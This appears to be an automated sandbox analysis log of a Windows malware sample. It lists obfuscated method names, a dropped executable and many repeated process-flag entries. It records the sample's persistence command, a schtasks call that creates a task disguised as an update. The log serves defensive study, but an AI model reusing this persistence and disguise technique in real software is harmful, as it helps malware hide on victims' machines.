                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, UakL7sKoGotEXVmhgN.csHigh entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, DXYb74JvCf3hSRbyBWK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, M782IFS87VYPID5jlC.csHigh entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Ol4IUSXbtb4CW66ULT.csHigh entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, eQoN8V4ZQKOo5fBfcW.csHigh entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Q88LQxsQcXJs1kQMVN.csHigh entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, jUd3Iw3wbFFMK2SL4c.csHigh entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, lj55A0LOMPVEbPDdds.csHigh entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, i683mmclysbpgLaM5y.csHigh entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, S0hOXR1XtDPS19yNu0.csHigh entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Jgrt1XzoXMntc59G8h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, tyZ3hcDXwYckf869Y8.csHigh entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, H6NLodPeuiC6nVqsgI.csHigh entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
